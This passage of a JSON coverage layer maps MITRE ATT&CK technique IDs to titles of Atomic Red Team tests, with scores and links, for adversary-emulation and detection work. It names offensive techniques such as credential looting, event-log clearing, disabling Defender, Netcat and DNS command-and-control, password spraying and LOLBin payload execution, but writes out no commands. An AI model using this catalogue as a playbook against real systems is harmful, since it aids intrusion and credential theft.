Encoded VBS code execution\n- Extract Memory via VBA\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"}]},{"techniqueID":"T1059.007","score":2,"enabled":true,"comment":"\n- JScript execution to gather local computer information via cscript\n- JScript execution to gather local computer information via wscript\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.007/T1059.007.md"}]},{"techniqueID":"T1069","score":19,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069/T1069.md"}]},{"techniqueID":"T1069.001","score":5,"enabled":true,"comment":"\n- Basic Permission Groups Discovery Windows (Local)\n- Permission Groups Discovery PowerShell (Local)\n- SharpHound3 - LocalAdmin\n- Wmic Group Discovery\n- WMIObject Group Discovery\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1069.002","score":14,"enabled":true,"comment":"\n- Basic Permission Groups Discovery Windows (Domain)\n- Permission Groups Discovery PowerShell (Domain)\n- Elevated group enumeration using net group (Domain)\n- Find machines where user has local admin access (PowerView)\n- Find local admins on all machines in domain (PowerView)\n- Find Local Admins via Group Policy (PowerView)\n- Enumerate Users Not Requiring Pre Auth (ASRepRoast)\n- Adfind - Query Active Directory Groups\n- Enumerate Active Directory Groups with Get-AdGroup\n- Enumerate Active Directory Groups with ADSISearcher\n- Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting)\n- Get-DomainGroupMember with PowerView\n- Get-DomainGroup with PowerView\n- Active Directory Enumeration with LDIFDE\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"}]},{"techniqueID":"T1070","score":25,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"}],"comment":"\n- Indicator Removal using FSUtil\n- Indicator Manipulation using FSUtil\n"},{"techniqueID":"T1070.001","score":3,"enabled":true,"comment":"\n- Clear Logs\n- Delete System Logs Using Clear-EventLog\n- Clear Event Logs via VBA\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"}]},{"techniqueID":"T1070.003","score":3,"enabled":true,"comment":"\n- Prevent Powershell History Logging\n- Clear Powershell History by Deleting History File\n- Set Custom AddToHistoryHandler to Avoid History File Logging\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070.004","score":6,"enabled":true,"comment":"\n- Delete a single file - Windows cmd\n- Delete an entire folder - Windows cmd\n- Delete a single file - Windows PowerShell\n- Delete an entire folder - Windows PowerShell\n- Delete Prefetch File\n- Delete TeamViewer Log Files\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070.005","score":5,"enabled":true,"comment":"\n- Add Network Share\n- Remove Network Share\n- Remove Network Share PowerShell\n- Disable Administrative Share Creation at Startup\n- Remove Administrative Shares\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"}]},{"techniqueID":"T1070.006","score":4,"enabled":true,"comment":"\n- Windows - Modify file creation timestamp with PowerShell\n- Windows - Modify file last modified timestamp with PowerShell\n- 
Windows - Modify file last access timestamp with PowerShell\n- Windows - Timestomp a File\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1070.008","score":2,"enabled":true,"comment":"\n- Copy and Delete Mailbox Data on Windows\n- Copy and Modify Mailbox Data on Windows\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.008/T1070.008.md"}]},{"techniqueID":"T1071","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071/T1071.md"}]},{"techniqueID":"T1071.001","score":2,"enabled":true,"comment":"\n- Malicious User Agents - Powershell\n- Malicious User Agents - CMD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1071.004","score":4,"enabled":true,"comment":"\n- DNS Large Query Volume\n- DNS Regular Beaconing\n- DNS Long Domain Query\n- DNS C2\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"}]},{"techniqueID":"T1072","score":2,"enabled":true,"comment":"\n- Radmin Viewer Utility\n- PDQ Deploy RAT\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"}]},{"techniqueID":"T1074","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074/T1074.md"}]},{"techniqueID":"T1074.001","score":2,"enabled":true,"comment":"\n- Stage data from Discovery.bat\n- Zip a Folder with PowerShell for Staging in Temp\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1078","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.001","score":2,"enabled":true,"comment":"\n- Enable Guest account with RDP capability and admin privileges\n- Activate Guest Account\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"}]},{"techniqueID":"T1078.003","score":3,"enabled":true,"comment":"\n- Create local account with admin privileges\n- WinPwn - Loot local Credentials - powerhell kittie\n- WinPwn - Loot local Credentials - Safetykatz\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"}]},{"techniqueID":"T1082","score":20,"enabled":true,"comment":"\n- System Information Discovery\n- Hostname Discovery (Windows)\n- Windows MachineGUID Discovery\n- Griffon Recon\n- Environment variables discovery on windows\n- WinPwn - winPEAS\n- WinPwn - itm4nprivesc\n- WinPwn - Powersploits privesc checks\n- WinPwn - General privesc checks\n- WinPwn - GeneralRecon\n- WinPwn - Morerecon\n- WinPwn - RBCD-Check\n- WinPwn - PowerSharpPack - Watson searching for missing windows patches\n- WinPwn - PowerSharpPack - Sharpup checking common Privesc vectors\n- WinPwn - PowerSharpPack - Seatbelt\n- System Information Discovery with WMIC\n- Driver Enumeration using DriverQuery\n- System Information Discovery\n- Check computer location\n- BIOS Information Discovery through Registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1083","score":4,"enabled":true,"comment":"\n- File and Directory Discovery (cmd.exe)\n- File and Directory Discovery (PowerShell)\n- Simulating MAZE 
Directory Enumeration\n- Launch DirLister Executable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1087","score":25,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087/T1087.md"}]},{"techniqueID":"T1087.001","score":3,"enabled":true,"comment":"\n- Enumerate all accounts on Windows (Local)\n- Enumerate all accounts via PowerShell (Local)\n- Enumerate logged on users via CMD (Local)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1087.002","score":22,"enabled":true,"comment":"\n- Enumerate all accounts (Domain)\n- Enumerate all accounts via PowerShell (Domain)\n- Enumerate logged on users via CMD (Domain)\n- Automated AD Recon (ADRecon)\n- Adfind -Listing password policy\n- Adfind - Enumerate Active Directory Admins\n- Adfind - Enumerate Active Directory User Objects\n- Adfind - Enumerate Active Directory Exchange AD Objects\n- Enumerate Default Domain Admin Details (Domain)\n- Enumerate Active Directory for Unconstrained Delegation\n- Get-DomainUser with PowerView\n- Enumerate Active Directory Users with ADSISearcher\n- Enumerate Linked Policies In ADSISearcher Discovery\n- Enumerate Root Domain linked policies Discovery\n- WinPwn - generaldomaininfo\n- Kerbrute - userenum\n- Wevtutil - Discover NTLM Users Remote\n- Suspicious LAPS Attributes Query with Get-ADComputer all properties\n- Suspicious LAPS Attributes Query with Get-ADComputer ms-Mcs-AdmPwd property\n- Suspicious LAPS Attributes Query with Get-ADComputer all properties and SearchScope\n- Suspicious LAPS Attributes Query with adfind all properties\n- Suspicious LAPS Attributes Query with adfind ms-Mcs-AdmPwd\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"}]},{"techniqueID":"T1090","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090/T1090.md"}]},{"techniqueID":"T1090.001","score":1,"enabled":true,"comment":"\n- portproxy reg key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1090.003","score":2,"enabled":true,"comment":"\n- Psiphon\n- Tor Proxy Usage - Windows\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.003/T1090.003.md"}]},{"techniqueID":"T1091","score":1,"enabled":true,"comment":"\n- USB Malware Spread Simulation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1091/T1091.md"}]},{"techniqueID":"T1095","score":3,"enabled":true,"comment":"\n- ICMP C2\n- Netcat C2\n- Powercat C2\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"}]},{"techniqueID":"T1098","score":10,"enabled":true,"comment":"\n- Admin Account Manipulate\n- Domain Account and Group Manipulate\n- Password Change on Directory Service Restore Mode (DSRM) Account\n- Domain Password Policy Check: Short Password\n- Domain Password Policy Check: No Number in Password\n- Domain Password Policy Check: No Special Character in Password\n- Domain Password Policy Check: No Uppercase Character in Password\n- Domain Password Policy Check: No Lowercase Character in Password\n- Domain Password Policy Check: Only Two Character Classes\n- Domain Password Policy Check: Common Password Use\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1105","score":21,"enabled":true,"comment":"\n- 
certutil download (urlcache)\n- certutil download (verifyctl)\n- Windows - BITSAdmin BITS Download\n- Windows - PowerShell Download\n- OSTAP Worming Activity\n- svchost writing a file to a UNC path\n- Download a File with Windows Defender MpCmdRun.exe\n- File Download via PowerShell\n- File download with finger.exe on Windows\n- Download a file with IMEWDBLD.exe\n- Curl Download File\n- Curl Upload File\n- Download a file with Microsoft Connection Manager Auto-Download\n- MAZE Propagation Script\n- Printer Migration Command-Line Tool UNC share folder into a zip file\n- Lolbas replace.exe use to copy file\n- Lolbas replace.exe use to copy UNC file\n- certreq download\n- Download a file using wscript\n- Nimgrab - Transfer Files\n- iwr or Invoke Web-Request download\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1106","score":5,"enabled":true,"comment":"\n- Execution through API - CreateProcess\n- WinPwn - Get SYSTEM shell - Pop System Shell using CreateProcess technique\n- WinPwn - Get SYSTEM shell - Bind System Shell using CreateProcess technique\n- WinPwn - Get SYSTEM shell - Pop System Shell using NamedPipe Impersonation technique\n- Run Shellcode via Syscall in Go\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"}]},{"techniqueID":"T1110","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.001","score":3,"enabled":true,"comment":"\n- Brute Force Credentials of single Active Directory domain users via SMB\n- Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos)\n- Password Brute User using Kerbrute Tool\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110.002","score":1,"enabled":true,"comment":"\n- Password Cracking with Hashcat\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"}]},{"techniqueID":"T1110.003","score":6,"enabled":true,"comment":"\n- Password Spray all Domain Users\n- Password Spray (DomainPasswordSpray)\n- Password spray all Active Directory domain users with a single password via LDAP against domain controller (NTLM or Kerberos)\n- WinPwn - DomainPasswordSpray Attacks\n- Password Spray Invoke-DomainPasswordSpray Light\n- Password Spray using Kerbrute Tool\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1110.004","score":1,"enabled":true,"comment":"\n- Brute Force:Credential Stuffing using Kerbrute Tool\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"}]},{"techniqueID":"T1112","score":68,"enabled":true,"comment":"\n- Modify Registry of Current User Profile - cmd\n- Modify Registry of Local Machine - cmd\n- Modify registry to store logon credentials\n- Add domain to Trusted sites Zone\n- Javascript in registry\n- Change Powershell Execution Policy to Bypass\n- BlackByte Ransomware Registry Changes - CMD\n- BlackByte Ransomware Registry Changes - Powershell\n- Disable Windows Registry Tool\n- Disable Windows CMD application\n- Disable Windows Task Manager application\n- Disable Windows Notification Center\n- Disable Windows Shutdown Button\n- Disable Windows LogOff Button\n- Disable Windows Change Password Feature\n- Disable Windows Lock Workstation Feature\n- Activate Windows NoDesktop Group Policy Feature\n- Activate Windows NoRun Group Policy Feature\n- Activate Windows NoFind Group Policy Feature\n- 
Activate Windows NoControlPanel Group Policy Feature\n- Activate Windows NoFileMenu Group Policy Feature\n- Activate Windows NoClose Group Policy Feature\n- Activate Windows NoSetTaskbar Group Policy Feature\n- Activate Windows NoTrayContextMenu Group Policy Feature\n- Activate Windows NoPropertiesMyDocuments Group Policy Feature\n- Hide Windows Clock Group Policy Feature\n- Windows HideSCAHealth Group Policy Feature\n- Windows HideSCANetwork Group Policy Feature\n- Windows HideSCAPower Group Policy Feature\n- Windows HideSCAVolume Group Policy Feature\n- Windows Modify Show Compress Color And Info Tip Registry\n- Windows Powershell Logging Disabled\n- Windows Add Registry Value to Load Service in Safe Mode without Network\n- Windows Add Registry Value to Load Service in Safe Mode with Network\n- Disable Windows Toast Notifications\n- Disable Windows Security Center Notifications\n- Suppress Win Defender Notifications\n- Allow RDP Remote Assistance Feature\n- NetWire RAT Registry Key Creation\n- Ursnif Malware Registry Key Creation\n- Terminal Server Client Connection History Cleared\n- Disable Windows Error Reporting Settings\n- DisallowRun Execution Of Certain Applications\n- Enabling Restricted Admin Mode via Command_Prompt\n- Mimic Ransomware - Enable Multiple User Sessions\n- Mimic Ransomware - Allow Multiple RDP Sessions per User\n- Event Viewer Registry Modification - Redirection URL\n- Event Viewer Registry Modification - Redirection Program\n- Enabling Remote Desktop Protocol via Remote Registry\n- Disable Win Defender Notification\n- Disable Windows OS Auto Update\n- Disable Windows Auto Reboot for current logon user\n- Windows Auto Update Option to Notify before download\n- Do Not Connect To Win Update\n- Tamper Win Defender Protection\n- Snake Malware Registry Blob\n- Allow Simultaneous Download Registry\n- Modify Internet Zone Protocol Defaults in Current User Registry - cmd\n- Modify Internet Zone Protocol Defaults in Current User Registry - 
PowerShell\n- Activities To Disable Secondary Authentication Detected By Modified Registry Value.\n- Activities To Disable Microsoft [FIDO Aka Fast IDentity Online] Authentication Detected By Modified Registry Value.\n- Scarab Ransomware Defense Evasion Activities\n- Disable Remote Desktop Anti-Alias Setting Through Registry\n- Disable Remote Desktop Security Settings Through Registry\n- Disabling ShowUI Settings of Windows Error Reporting (WER)\n- Enable Proxy Settings\n- Set-Up Proxy Server\n- RDP Authentication Level Override\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"}]},{"techniqueID":"T1113","score":2,"enabled":true,"comment":"\n- Windows Screencapture\n- Windows Screen Capture (CopyFromScreen)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1114","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114/T1114.md"}]},{"techniqueID":"T1114.001","score":1,"enabled":true,"comment":"\n- Email Collection with PowerShell Get-Inbox\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"}]},{"techniqueID":"T1115","score":3,"enabled":true,"comment":"\n- Utilize Clipboard to store or execute commands from\n- Execute Commands from Clipboard using PowerShell\n- Collect Clipboard Data via VBA\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"}]},{"techniqueID":"T1119","score":4,"enabled":true,"comment":"\n- Automated Collection Command Prompt\n- Automated Collection PowerShell\n- Recon information for export with PowerShell\n- Recon information for export with Command Prompt\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"}]},{"techniqueID":"T1120","score":2,"enabled":true,"comment":"\n- Win32_PnPEntity Hardware Inventory\n- WinPwn - printercheck\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"}]},{"techniqueID":"T1123","score":2,"enabled":true,"comment":"\n- using device audio capture commandlet\n- Registry artefact when application use microphone\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"}]},{"techniqueID":"T1124","score":4,"enabled":true,"comment":"\n- System Time Discovery\n- System Time Discovery - PowerShell\n- System Time Discovery W32tm as a Delay\n- System Time with Windows time Command\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"}]},{"techniqueID":"T1125","score":1,"enabled":true,"comment":"\n- Registry artefact when application use webcam\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1125/T1125.md"}]},{"techniqueID":"T1127","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127/T1127.md"}],"comment":"\n- Lolbin Jsc.exe compile javascript to exe\n- Lolbin Jsc.exe compile javascript to dll\n"},{"techniqueID":"T1127.001","score":2,"enabled":true,"comment":"\n- MSBuild Bypass Using Inline Tasks (C#)\n- MSBuild Bypass Using Inline Tasks (VB)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"}]},{"techniqueID":"T1129","score":1,"enabled":true,"comment":"\n- ESXi - Install a custom VIB on an ESXi host\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1129/T1129.md"}]},{"techniqueID":"T1132","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132/T1132.md"}]},{"techniqueID":"T1132.001","score":1,"enabled":true,"comment":"\n- XOR Encoded data.\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"}]},{"techniqueID":"T1133","score":1,"enabled":true,"comment":"\n- Running Chrome VPN Extensions via the Registry 2 vpn extension\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"}]},{"techniqueID":"T1134","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134/T1134.md"}]},{"techniqueID":"T1134.001","score":4,"enabled":true,"comment":"\n- Named pipe client impersonation\n- `SeDebugPrivilege` token duplication\n- Launch NSudo Executable\n- Bad Potato\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"}]},{"techniqueID":"T1134.002","score":2,"enabled":true,"comment":"\n- Access Token Manipulation\n- WinPwn - Get SYSTEM shell - Pop System Shell using Token Manipulation technique\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.002/T1134.002.md"}]},{"techniqueID":"T1134.004","score":5,"enabled":true,"comment":"\n- Parent PID Spoofing using PowerShell\n- Parent PID Spoofing - Spawn from Current Process\n- Parent PID Spoofing - Spawn from Specified Process\n- Parent PID Spoofing - Spawn from svchost.exe\n- Parent PID Spoofing - Spawn from New Process\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"}]},{"techniqueID":"T1134.005","score":1,"enabled":true,"comment":"\n- Injection SID-History with mimikatz\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.005/T1134.005.md"}]},{"techniqueID":"T1135","score":7,"enabled":true,"comment":"\n- Network Share Discovery command prompt\n- Network Share Discovery PowerShell\n- View available share drives\n- Share Discovery with PowerView\n- PowerView ShareFinder\n- WinPwn - shareenumeration\n- Network Share Discovery via dir command\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1136","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.001","score":4,"enabled":true,"comment":"\n- Create a new user in a command prompt\n- Create a new user in PowerShell\n- Create a new Windows admin user\n- Create a new Windows admin user via .NET\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1136.002","score":3,"enabled":true,"comment":"\n- Create a new Windows domain admin user\n- Create a new account similar to ANONYMOUS LOGON\n- Create a new Domain Account using PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"}]},{"techniqueID":"T1137","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"}],"comment":"\n- Office Application Startup - Outlook as a C2\n"},{"techniqueID":"T1137.002","score":1,"enabled":true,"comment":"\n- Office Application Startup Test Persistence 
(HKCU)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"}]},{"techniqueID":"T1137.004","score":1,"enabled":true,"comment":"\n- Install Outlook Home Page Persistence\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"}]},{"techniqueID":"T1137.006","score":5,"enabled":true,"comment":"\n- Code Executed Via Excel Add-in File (XLL)\n- Persistent Code Execution Via Excel Add-in File (XLL)\n- Persistent Code Execution Via Word Add-in File (WLL)\n- Persistent Code Execution Via Excel VBA Add-in File (XLAM)\n- Persistent Code Execution Via PowerPoint VBA Add-in File (PPAM)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"}]},{"techniqueID":"T1140","score":2,"enabled":true,"comment":"\n- Deobfuscate/Decode Files Or Information\n- Certutil Rename and Decode\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1176","score":5,"enabled":true,"comment":"\n- Chrome/Chromium (Developer Mode)\n- Chrome/Chromium (Chrome Web Store)\n- Firefox\n- Edge Chromium Addon - VPN\n- Google Chrome Load Unpacked Extension With Command Line\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1187","score":2,"enabled":true,"comment":"\n- PetitPotam\n- WinPwn - PowerSharpPack - Retrieving NTLM Hashes without Touching LSASS\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1187/T1187.md"}]},{"techniqueID":"T1195","score":1,"enabled":true,"comment":"\n- Octopus Scanner Malware Open Source Supply Chain\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1195/T1195.md"}]},{"techniqueID":"T1197","score":4,"enabled":true,"comment":"\n- Bitsadmin Download (cmd)\n- Bitsadmin Download (PowerShell)\n- Persist, Download, & Execute\n- Bits download using desktopimgdownldr.exe (cmd)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"}]},{"techniqueID":"T1201","score":5,"enabled":true,"comment":"\n- Examine local password policy - Windows\n- Examine domain password policy - Windows\n- Get-DomainPolicy with PowerView\n- Enumerate Active Directory Password Policy with get-addefaultdomainpasswordpolicy\n- Use of SecEdit.exe to export the local security policy (including the password policy)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1202","score":3,"enabled":true,"comment":"\n- Indirect Command Execution - pcalua.exe\n- Indirect Command Execution - forfiles.exe\n- Indirect Command Execution - conhost.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"}]},{"techniqueID":"T1204","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204/T1204.md"}]},{"techniqueID":"T1204.002","score":11,"enabled":true,"comment":"\n- OSTap Style Macro Execution\n- OSTap Payload Download\n- Maldoc choice flags command execution\n- OSTAP JS version\n- Office launching .bat file from AppData\n- Excel 4 Macro\n- Headless Chrome code execution via VBA\n- Potentially Unwanted Applications (PUA)\n- Office Generic Payload Download\n- LNK Payload Download\n- Mirror Blast Emulation\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"}]},{"techniqueID":"T1204.003","score":1,"enabled":true,"comment":"\n- Malicious Execution from Mounted ISO Image\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.003/T1204.003.md"}]},{"techniqueID":"T1207","score":1,"enabled":true,"comment":"\n- DCShadow (Active Directory)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"}]},{"techniqueID":"T1216","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"}],"comment":"\n- SyncAppvPublishingServer Signed Script PowerShell Command Execution\n- manage-bde.wsf Signed Script Command Execution\n"},{"techniqueID":"T1216.001","score":1,"enabled":true,"comment":"\n- PubPrn.vbs Signed Script Bypass\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"}]},{"techniqueID":"T1217","score":4,"enabled":true,"comment":"\n- List Google Chrome / Opera Bookmarks on Windows with powershell\n- List Google Chrome / Edge Chromium Bookmarks on Windows with command prompt\n- List Mozilla Firefox bookmarks on Windows with command prompt\n- List Internet Explorer Bookmarks using the command prompt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1218","score":77,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"}],"comment":"\n- mavinject - Inject DLL into running process\n- Register-CimProvider - Execute evil dll\n- InfDefaultInstall.exe .inf Execution\n- ProtocolHandler.exe Downloaded a Suspicious File\n- Microsoft.Workflow.Compiler.exe Payload 
Execution\n- Renamed Microsoft.Workflow.Compiler.exe Payload Executions\n- Invoke-ATHRemoteFXvGPUDisablementCommand base test\n- DiskShadow Command Execution\n- Load Arbitrary DLL via Wuauclt (Windows Update Client)\n- Lolbin Gpscript logon option\n- Lolbin Gpscript startup option\n- Lolbas ie4uinit.exe use as proxy\n- LOLBAS CustomShellHost to Spawn Process\n- Provlaunch.exe Executes Arbitrary Command via Registry Key\n- LOLBAS Msedge to Spawn Process\n"},{"techniqueID":"T1218.001","score":8,"enabled":true,"comment":"\n- Compiled HTML Help Local Payload\n- Compiled HTML Help Remote Payload\n- Invoke CHM with default Shortcut Command Execution\n- Invoke CHM with InfoTech Storage Protocol Handler\n- Invoke CHM Simulate Double click\n- Invoke CHM with Script Engine and Help Topic\n- Invoke CHM Shortcut Command with ITS and Help Topic\n- Decompile Local CHM File\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"}]},{"techniqueID":"T1218.002","score":1,"enabled":true,"comment":"\n- Control Panel Items\n","links":[{"label":"View 